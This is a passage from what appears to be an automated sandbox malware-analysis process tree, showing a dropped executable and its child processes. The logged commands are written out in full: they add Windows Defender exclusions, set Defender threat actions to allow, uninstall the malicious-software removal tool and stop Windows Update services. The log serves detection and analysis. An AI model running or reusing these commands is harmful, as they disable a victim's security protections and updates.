      C:\Windows\system32\sc.exe stop bits
      4⤵
      Launches sc.exe
      PID:3944
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:4792
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop dosvc
      4⤵
      PID:880
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      PID:5672
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      PID:4400
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      PID:4872
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      PID:1416
  - - C:\Windows\explorer.exe
      explorer.exe
      4⤵
      PID:5668
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    PID:1424
- - C:\ProgramData\wikombernizc\reakuqnanrkn.exe
    "C:\ProgramData\wikombernizc\reakuqnanrkn.exe"
    3⤵
    - Executes dropped EXE
    PID:1104
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Modifies data under HKEY_USERS
      PID:928
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:3200
    - - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:2740
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop UsoSvc
      4⤵
      Launches sc.exe
      PID:5948
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:1868
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop wuauserv
      4⤵
      Launches sc.exe
      PID:3948
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop bits
      4⤵
      PID:2012
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop dosvc
      4⤵
      Launches sc.exe
      PID:3944
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      PID:880
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      PID:3652
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      PID:2040
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:5724
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      PID:4296
  - - C:\Windows\explorer.exe
      explorer.exe
      4⤵
      PID:5348
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:2008
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4176
- - C:\ProgramData\wikombernizc\reakuqnanrkn.exe
    "C:\ProgramData\wikombernizc\reakuqnanrkn.exe"
    3⤵
    PID:1424
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:6104
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:1484
    - - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:4992
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop UsoSvc
      4⤵
      PID:4592
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop WaaSMedicSvc
      4⤵
      PID:3540
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop wuauserv
      4⤵
      Launches sc.exe
      PID:3332
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop bits
      4⤵
      Launches sc.exe
      PID:2344
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop dosvc
      4⤵
      Launches sc.exe
      PID:5696
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      PID:1996
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      PID:1840
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      PID:3012
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      PID:3296
  - - C:\Windows\explorer.exe
      explorer.exe
      4⤵
      PID:1860
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:2540
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:224
- - C:\ProgramData\wikombernizc\reakuqnanrkn.exe
    "C:\ProgramData\wikombernizc\reakuqnanrkn.exe"
    3⤵
    PID:4448
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4832
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:5428
    - - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:5992
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop UsoSvc
      4⤵
      Launches sc.exe
      PID:3992
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:3600
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:5344
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop wuauserv
      4⤵
      PID:4772
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop bits
      4⤵
      Launches sc.exe
      PID:368
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:880
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop dosvc
      4⤵
      PID:1064
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      PID:2436
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      PID:5672
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      PID:5628
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      PID:5328
  - - C:\Windows\explorer.exe
      explorer.exe
      4⤵
      PID:4664
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:3492
- - C:\ProgramData\wikombernizc\reakuqnanrkn.exe
    "C:\ProgramData\wikombernizc\reakuqnanrkn.exe"
    3⤵
    PID:2064
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:3768
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:3556
    - - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:6052
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop UsoSvc
      4⤵
      Launches sc.exe
      PID:5048
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:1512
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop wuauserv
      4⤵
      Launches sc.exe
      PID:1704
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop bits
      4⤵
      Launches sc.exe
      PID:4872
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop dosvc
      4⤵
      Launches sc.exe
      PID:2080
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      PID:6084
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      PID:3204
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      PID:4104
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      PID:5236
  - - C:\Windows\explorer.exe
      explorer.exe
      4⤵
      PID:212
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:6112
- - C:\ProgramData\wikombernizc\reakuqnanrkn.exe
    "C:\ProgramData\wikombernizc\reakuqnanrkn.exe"
    3⤵
    PID:5580
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:2324
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:4780
    - - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:224
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop UsoSvc
      4⤵
      Launches sc.exe
      PID:1084
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:1536
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop wuauserv
      4⤵
      Launches sc.exe
      PID:2156
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop bits
      4⤵
      Launches sc.exe
      PID:1424
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop dosvc
      4⤵
      Launches sc.exe
      PID:5604
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      PID:2856
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      PID:5440
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      PID:5392
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      PID:6040
  - - C:\Windows\explorer.exe
      explorer.exe
      4⤵
      PID:5048
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:5820
- - C:\ProgramData\wikombernizc\reakuqnanrkn.exe
    "C:\ProgramData\wikombernizc\reakuqnanrkn.exe"
    3⤵
    PID:4296
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4792
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:4360
    - - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:1756
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop UsoSvc
      4⤵
      PID:6004
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop WaaSMedicSvc
      4⤵
      PID:2140
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop wuauserv
      4⤵
      Launches sc.exe
      PID:3612
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop bits
      4⤵
      Launches sc.exe
      PID:4324
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop dosvc
      4⤵
      Launches sc.exe
      PID:4952
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      PID:2980
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      PID:3268
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      PID:3724
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      PID:2540
  - - C:\Windows\explorer.exe
      explorer.exe
      4⤵
      PID:4632
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:2296
- - C:\ProgramData\wikombernizc\reakuqnanrkn.exe
    "C:\ProgramData\wikombernizc\reakuqnanrkn.exe"
    3⤵
    PID:4440
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:5024
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:1900
    - - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:5772
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop UsoSvc
      4⤵
      Launches sc.exe
      PID:3540
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:656
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop wuauserv
      4⤵
      Launches sc.exe
      PID:5332
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop bits
      4⤵
      Launches sc.exe
      PID:4448
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop dosvc
      4⤵
      Launches sc.exe
      PID:3436
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      PID:6100
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      PID:4868
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      PID:4648
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      PID:5744
  - - C:\Windows\explorer.exe
      explorer.exe
      4⤵
      PID:2460
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4592

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1512 -ip 1512
1⤵
PID:1996

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2452 -ip 2452
1⤵
PID:5716

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 3988 -ip 3988
1⤵
PID:3608

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 5944 -ip 5944
1⤵
PID:3600

C:\Users\Admin\AppData\Local\Temp\7zS654D.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS654D.tmp\Install.exe it /XMididbuyV 385118 /S
1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:2216
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:4176
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    PID:6072
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:2396
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:224
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  PID:3600
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ADJLsahCU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ADJLsahCU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DQANlvmTAvZU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DQANlvmTAvZU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PZjcxajBIsNTC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PZjcxajBIsNTC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mWJfrhglotUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mWJfrhglotUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyWMmqtuSNndeGVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyWMmqtuSNndeGVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  PID:4888
- C:\Windows\SysWOW64\schtasks.exe
